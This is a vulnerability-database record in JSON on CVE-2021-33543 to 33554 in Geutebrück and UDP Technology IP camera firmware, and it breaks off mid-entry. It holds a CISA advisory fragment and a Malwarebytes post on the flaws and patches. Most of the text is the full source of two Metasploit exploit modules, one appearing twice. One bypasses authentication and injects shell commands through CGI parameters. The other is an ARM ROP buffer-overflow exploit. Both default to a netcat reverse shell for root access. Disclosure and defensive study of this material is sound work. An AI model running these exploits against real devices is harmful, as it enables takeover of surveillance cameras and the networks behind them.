"https://gcc02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fportal.geutebrueck.com%2F&data=04%7C01%7Cpaul.lambert%40inl.gov%7Cf980cf8ed61e45ce028808d9505ef3d2%7C4cf464b7869a42368da2a98566485554%7C0%7C0%7C637629191029853114%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=8UP9NuwqOke19wr7iDG2ZjnJt33fyYNXLb3FeAZCPJ0%3D&reserved=0", "https://us-cert.cisa.gov/ics/recommended-practices", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://us-cert.cisa.gov/ics", "https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2021-33543", "CVE-2021-33544", "CVE-2021-33545", "CVE-2021-33546", "CVE-2021-33547", "CVE-2021-33548", "CVE-2021-33549", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"], "immutableFields": [], "lastseen": "2022-10-26T00:14:37", "viewCount": 55, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0709"]}, {"type": "cve", "idList": ["CVE-2021-33543", "CVE-2021-33544", "CVE-2021-33545", "CVE-2021-33546", "CVE-2021-33547", "CVE-2021-33548", "CVE-2021-33549", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9B3D79CAF7E799FA5C5583B0FFCAB466"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-GEUTEBRUCK_CMDINJECT_CVE_2021_335XX-"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164036", "PACKETSTORM:164191"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:87258C1DADE2252F01C88F01B6B88F78", "RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636"]}, {"type": "seebug", "idList": ["SSV:99328"]}, {"type": "zdt", "idList": ["1337DAY-ID-36710", "1337DAY-ID-36768"]}]}, "score": {"value": 1.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["CAM"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0709"]}, {"type": "cve", "idList": ["CVE-2021-33551"]}, {"type": "ics", "idList": ["ICSA-13-011-01", "ICSA-13-149-01", "ICSA-19-255-02", "ICSA-19-344-07", "ICSA-20-282-01"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9B3D79CAF7E799FA5C5583B0FFCAB466"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164036"]}, {"type": "seebug", "idList": ["SSV:99328"]}, {"type": "threatpost", "idList": ["THREATPOST:134A95E2E7432DE5E6F46316E469C55B", "THREATPOST:75B109B5B464EBEE349E710C31FA89E1"]}]}, "exploitation": null, "vulnersScore": 1.5}, "_state": {"dependencies": 1666743321, "score": 1666743532}, "_internal": {"score_hash": "c069c83a61365da513c09a1163a3e774"}}

{"malwarebytes": [{"lastseen": "2021-07-28T16:33:23", "description": "Researchers at [RandoriSec](<https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/>) have found serious vulnerabilities in the firmware provided by UDP Technology to [Geutebr\u00fcck](<https://www.geutebrueck.com/>) and many other IP camera vendors. According to the researchers the firmware supplier UDP Technology fails to respond to their reports despite numerous mails and LinkedIn messages.\n\nBecause of this unwillingness of UDP Technology to respond, RandoriSec worked with Geutebr\u00fcck, one of the camera vendors, to correct the 11 authenticated RCE vulnerabilities and a complete authentication bypass that they found in the firmware.\n\n### History lessons\n\nRandoriSec had found vulnerabilities in previous versions of the UDP technology firmware and knew from that previous experience that they could expect to be stonewalled when they reported the new vulnerabilities. UDP Technology provides firmware for several IP camera manufacturers, like:\n\n * Geutebruck\n * Ganz\n * Visualint\n * Cap\n * THRIVE Intelligence\n * Sophus\n * VCA\n * TripCorps\n * Sprinx Technologies\n * Smartec\n * Riva\n * and the camera\u2019s they sell under their own brand name.\n\n### CISA\n\nThe Cybersecurity & Infrastructure Security Agency issued an [advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>) about the two Geutebr\u00fcck IP camera types that were confirmed to be vulnerable, the G-Cam E2 and G-Code.\n\nThe CISA advisory includes the [CVE identifiers](<https://blog.malwarebytes.com/glossary/cve-identifier/>) for the found vulnerabilities. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). \n\n[CVE-2021-33543](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33543>) Missing authentication: allows unauthenticated remote access to sensitive files due to default user authentication settings.\n\n[CVE-2021-33544](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33544>) RCE: the affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33545](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33545>) RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33546](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33546>) RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33547](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33547>) RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33548](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33548>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33549](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33549>) RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33550](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33550>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33551](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33551>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33552](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33552>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33553](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33553>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n[CVE-2021-33554](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33554>) RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.\n\n### Impact of the vulnerabilities\n\nAs you can imagine, the combination of unauthorized access to sensitive files combined with that many RCE vulnerabilities creates a treasure trove for attackers, and finding an attack method that works for you is trivial. And it should not come as a surprise that public exploits are available.\n\nEven an attacker having access to your live-stream can be bad enough, but an attacker that has full control of your IP camera is even worse. And, what's more, a combination of the unauthorized access and some of the RCE vulnerabilities can allow an attacker to achieve root on the IP cameras that are running on the vulnerable firmware.\n\n### Mitigation\n\nFor the mentioned Geutebr\u00fcck cameras, a patch is [available](<https://gcc02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fportal.geutebrueck.com%2F&data=04%7C01%7Cpaul.lambert%40inl.gov%7Cf980cf8ed61e45ce028808d9505ef3d2%7C4cf464b7869a42368da2a98566485554%7C0%7C0%7C637629191029853114%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=8UP9NuwqOke19wr7iDG2ZjnJt33fyYNXLb3FeAZCPJ0%3D&reserved=0>) (Login required) and should be installed as soon as possible. Users are urgently recommended to update to firmware Version 1.12.14.7 or later. Geutebr\u00fcck worked with RandoriSec to make sure their patch fixes the vulnerabilities.\n\nFor users of other IP cameras we can not do much more than to recommend to either disable/replace the cameras and certainly query the vendors to find out whether their cameras suffer from the same vulnerabilities.\n\nAs a general advice for users of [IoT](<https://blog.malwarebytes.com/101/2017/12/internet-things-iot-security-never/>) devices, you can follow these CISA recommendations:\n\n * Change the default passwords of the cameras.\n * Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls and isolate them from the business network.\n * When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.\n\nVendors of the IP cameras running UDP Technology firmware are encouraged to ask some serious questions about the development of the firmware and why UDP Technology chooses not to work with security researchers in a way that benefits all the IP camera vendors instead of only the one working with the researchers. Geutebr\u00fcck users know which types are vulnerable and can remedy the vulnerabilities by installing a patch. Users of the other brands are left guessing, from reading between the lines in the RandoriSec blogpost, we fear the worst.\n\nFor a complete technical analysis of how the researchers found the vulnerabilities, you are encouraged to read the [RadoriSec blog](<https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/>) about it.\n\nThe post [UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/udp-technology-ip-camera-firmware-vulnerabilities-allow-for-attacker-to-achieve-root/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-28T13:04:39", "type": "malwarebytes", "title": "UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-33543", "CVE-2021-33544", "CVE-2021-33545", "CVE-2021-33546", "CVE-2021-33547", "CVE-2021-33548", "CVE-2021-33549", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"], "modified": "2021-07-28T13:04:39", "id": "MALWAREBYTES:9B3D79CAF7E799FA5C5583B0FFCAB466", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/udp-technology-ip-camera-firmware-vulnerabilities-allow-for-attacker-to-achieve-root/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-09-02T15:42:28", "description": "", "cvss3": {}, "published": "2021-09-02T00:00:00", "type": "packetstorm", "title": "Geutebruck Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33543", "CVE-2021-33544", "CVE-2021-33548", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"], "modified": "2021-09-02T00:00:00", "id": "PACKETSTORM:164036", "href": "https://packetstormsecurity.com/files/164036/Geutebruck-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Geutebruck Multiple Remote Command Execution', \n'Description' => %q{ \nThis module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder \nand exploits multiple authenticated arbitrary command execution vulnerabilities within \nthe parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, \nEFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as \nwell as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in \nremote code execution as the root user. \n}, \n \n'Author' => [ \n'Titouan Lazard', # Of RandoriSec - Discovery \n'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module \n'S\u00e9bastien Charbonnier' # Of RandoriSec - Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2021-33543'], \n['CVE', '2021-33544'], \n['CVE', '2021-33548'], \n['CVE', '2021-33550'], \n['CVE', '2021-33551'], \n['CVE', '2021-33552'], \n['CVE', '2021-33553'], \n['CVE', '2021-33554'], \n[ 'URL', 'http://geutebruck.com' ], \n[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], \n[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] \n], \n'DisclosureDate' => '2021-07-08', \n'Privileged' => true, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Targets' => [ \n[ \n'CVE-2021-33544 - certmngr.cgi', { \n'http_method' => 'GET', \n'http_vars' => { \n'action' => 'createselfcert', \n'local' => Rex::Text.rand_text_alphanumeric(10..16), \n'country' => Rex::Text.rand_text_alphanumeric(2), \n'state' => '$(PLACEHOLDER_CMD)', \n'organization' => Rex::Text.rand_text_alphanumeric(10..16), \n'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), \n'commonname' => Rex::Text.rand_text_alphanumeric(10..16), \n'days' => Rex::Text.rand_text_numeric(2..4), \n'type' => Rex::Text.rand_text_numeric(2..4) \n}, \n'uri' => '/../uapi-cgi/certmngr.cgi' \n} \n], \n[ \n'CVE-2021-33548 - factory.cgi', { \n'http_method' => 'GET', \n'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, \n'uri' => '/../uapi-cgi/factory.cgi' \n} \n], \n[ \n'CVE-2021-33550 - language.cgi', { \n'http_method' => 'GET', \n'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, \n'uri' => '/../uapi-cgi/language.cgi' \n} \n], \n[ \n'CVE-2021-33551 - oem.cgi', { \n'http_method' => 'GET', \n'http_vars' => { \n'action' => 'set', \n'enable' => 'yes', \n'environment.lang' => '$(PLACEHOLDER_CMD)' \n}, \n'uri' => '/../uapi-cgi/oem.cgi' \n} \n], \n[ \n'CVE-2021-33552 - simple_reclistjs.cgi', { \n'http_method' => 'GET', \n'http_vars' => { \n'action' => 'get', \n'timekey' => Rex::Text.rand_text_numeric(2..4), \n'date' => '$(PLACEHOLDER_CMD)' \n}, \n'uri' => '/../uapi-cgi/simple_reclistjs.cgi' \n} \n], \n[ \n'CVE-2021-33553 - testcmd.cgi', { \n'http_method' => 'GET', \n'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, \n'uri' => '/../uapi-cgi/testcmd.cgi' \n} \n], \n[ \n'CVE-2021-33554 - tmpapp.cgi', { \n'http_method' => 'GET', \n'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, \n'uri' => '/../uapi-cgi/tmpapp.cgi' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' \n}, \n'Notes' => { \n'Stability' => ['CRASH_SAFE'], \n'Reliability' => ['REPEATABLE_SESSION'], \n'SideEffects' => ['ARTIFACTS_ON_DISK'] \n} \n) \n) \nend \n \ndef firmware \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/brand.xml' \n) \nunless res \nprint_error('Connection failed!') \nreturn false \nend \n \nunless res&.body && !res.body.empty? \nprint_error('Empty body in the response!') \nreturn false \nend \n \nres_xml = res.get_xml_document \nif res_xml.at('//firmware').nil? \nprint_error('Target did not respond with a XML document containing the \"firmware\" element!') \nreturn false \nend \nraw_text = res_xml.at('//firmware').text \nif raw_text && raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/) \nraw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0] \nelse \nprint_error('Target responded with a XML document containing the \"firmware\" element but its not a valid version string!') \nfalse \nend \nend \n \ndef check \nversion = firmware \nif version == false \nreturn CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') \nend \n \nrex_version = Rex::Version.new(version) \nvprint_status(\"Found Geutebruck version #{rex_version}\") \nif rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') \nreturn CheckCode::Appears \nend \n \nCheckCode::Safe \nend \n \ndef exploit \nprint_status(\"#{rhost}:#{rport} - Setting up request...\") \n \nmethod = target['http_method'] \nif method == 'GET' \nhttp_method_vars = 'vars_get' \nelse \nhttp_method_vars = 'vars_post' \nend \n \nhttp_vars = target['http_vars'] \nhttp_vars.each do |(k, v)| \nif v.include? 'PLACEHOLDER_CMD' \nhttp_vars[k]['PLACEHOLDER_CMD'] = payload.encoded \nend \nend \n \nprint_status(\"Sending CMD injection request to #{rhost}:#{rport}\") \nsend_request_cgi( \n{ \n'method' => method, \n'uri' => target['uri'], \nhttp_method_vars => http_vars \n} \n) \nprint_status('Exploit complete, you should get a shell as the root user!') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164036/geutebruck_cmdinject_cve_2021_335xx.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-17T16:17:32", "description": "", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "packetstorm", "title": "Geutebruck instantrec Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33549"], "modified": "2021-09-17T00:00:00", "id": "PACKETSTORM:164191", "href": "https://packetstormsecurity.com/files/164191/Geutebruck-instantrec-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Geutebruck instantrec Remote Command Execution', \n'Description' => %q{ \nThis module exploits a buffer overflow within the 'action' \nparameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, \nETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware \nversions 1.12.13.2 and 1.12.14.5. \nSuccessful exploitation results in remote code execution as the root user. \n}, \n \n'Author' => [ \n'Titouan Lazard - RandoriSec', # Discovery \n'Ibrahim Ayadhi - RandoriSec' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2021-33549'], \n['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], \n['URL', 'http://geutebruck.com'], \n['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] \n], \n'DisclosureDate' => '2021-07-08', \n'Privileged' => true, \n'Platform' => %w[unix linux], \n'Arch' => [ARCH_ARMLE], \n'Targets' => [ \n['Automatic Target', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' \n}, \n'Notes' => { \n'Stability' => ['CRASH_SAFE'], \n'Reliability' => ['REPEATABLE_SESSION'], \n'SideEffects' => ['ARTIFACTS_ON_DISK'] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi']) \n] \n) \nend \n \ndef write_payload \n# gadgets \nlibc_add = 0x402da000 \nsystem_off = 0x00357fc \nlibc_data_off = 0x12c960 \nstr_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc; \npop_r0_off = 0x00101de4 # pop r0 pc \npop_r1_off = 0x0010252c # pop r1 pc \npop_r4_off = 0x00015164 # pop r4 pc \nsystem_ = libc_add + system_off \nstr_r1 = libc_add + str_r1_off \npop_r0 = libc_add + pop_r0_off \npop_r1 = libc_add + pop_r1_off \npop_r4 = libc_add + pop_r4_off \nadd_str = libc_data_off + libc_add + 4 \nchunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*') \nrop = [] \nrop += [pop_r4] \nrop += [add_str - 0x14] \nchunks.each_with_index do |chunk, index| \nrop += [pop_r1] \nrop += [chunk] \nrop += [str_r1] \nrop += if index != (chunks.length - 1) \n[add_str - 0x14 + ((index + 1) * 4)] \nelse \n[0x41414141] \nend \nend \nrop += [pop_r0] \nrop += [add_str] \nrop += [system_] \nrop.pack('V*') \nend \n \ndef exploit \nprint_status(\"#{rhost}:#{rport} - Attempting to exploit...\") \npad_size = 536 \ndata = Rex::Text.pattern_create(pad_size) + write_payload \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path), \n'vars_post' => { \n'action' => data \n} \n) \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164191/geutebruck_instantrec_bof.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2022-09-10T08:23:01", "description": "This Metasploit module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions 1.12.0.27 and below as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T00:00:00", "type": "zdt", "title": "Geutebruck Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33543", "CVE-2021-33544", "CVE-2021-33548", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"], "modified": "2021-09-02T00:00:00", "id": "1337DAY-ID-36710", "href": "https://0day.today/exploit/description/36710", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Geutebruck Multiple Remote Command Execution',\n 'Description' => %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user.\n },\n\n 'Author' => [\n 'Titouan Lazard', # Of RandoriSec - Discovery\n 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module\n 'S\u00e9bastien Charbonnier' # Of RandoriSec - Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-33543'],\n ['CVE', '2021-33544'],\n ['CVE', '2021-33548'],\n ['CVE', '2021-33550'],\n ['CVE', '2021-33551'],\n ['CVE', '2021-33552'],\n ['CVE', '2021-33553'],\n ['CVE', '2021-33554'],\n [ 'URL', 'http://geutebruck.com' ],\n [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],\n [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']\n ],\n 'DisclosureDate' => '2021-07-08',\n 'Privileged' => true,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Targets' => [\n [\n 'CVE-2021-33544 - certmngr.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'createselfcert',\n 'local' => Rex::Text.rand_text_alphanumeric(10..16),\n 'country' => Rex::Text.rand_text_alphanumeric(2),\n 'state' => '$(PLACEHOLDER_CMD)',\n 'organization' => Rex::Text.rand_text_alphanumeric(10..16),\n 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),\n 'commonname' => Rex::Text.rand_text_alphanumeric(10..16),\n 'days' => Rex::Text.rand_text_numeric(2..4),\n 'type' => Rex::Text.rand_text_numeric(2..4)\n },\n 'uri' => '/../uapi-cgi/certmngr.cgi'\n }\n ],\n [\n 'CVE-2021-33548 - factory.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/factory.cgi'\n }\n ],\n [\n 'CVE-2021-33550 - language.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/language.cgi'\n }\n ],\n [\n 'CVE-2021-33551 - oem.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'set',\n 'enable' => 'yes',\n 'environment.lang' => '$(PLACEHOLDER_CMD)'\n },\n 'uri' => '/../uapi-cgi/oem.cgi'\n }\n ],\n [\n 'CVE-2021-33552 - simple_reclistjs.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'get',\n 'timekey' => Rex::Text.rand_text_numeric(2..4),\n 'date' => '$(PLACEHOLDER_CMD)'\n },\n 'uri' => '/../uapi-cgi/simple_reclistjs.cgi'\n }\n ],\n [\n 'CVE-2021-33553 - testcmd.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },\n 'uri' => '/../uapi-cgi/testcmd.cgi'\n }\n ],\n [\n 'CVE-2021-33554 - tmpapp.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/tmpapp.cgi'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n },\n 'Notes' => {\n 'Stability' => ['CRASH_SAFE'],\n 'Reliability' => ['REPEATABLE_SESSION'],\n 'SideEffects' => ['ARTIFACTS_ON_DISK']\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/brand.xml'\n )\n unless res\n print_error('Connection failed!')\n return false\n end\n\n unless res&.body && !res.body.empty?\n print_error('Empty body in the response!')\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at('//firmware').nil?\n print_error('Target did not respond with a XML document containing the \"firmware\" element!')\n return false\n end\n raw_text = res_xml.at('//firmware').text\n if raw_text && raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error('Target responded with a XML document containing the \"firmware\" element but its not a valid version string!')\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target['http_method']\n if method == 'GET'\n http_method_vars = 'vars_get'\n else\n http_method_vars = 'vars_post'\n end\n\n http_vars = target['http_vars']\n http_vars.each do |(k, v)|\n if v.include? 'PLACEHOLDER_CMD'\n http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n 'method' => method,\n 'uri' => target['uri'],\n http_method_vars => http_vars\n }\n )\n print_status('Exploit complete, you should get a shell as the root user!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/36710", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 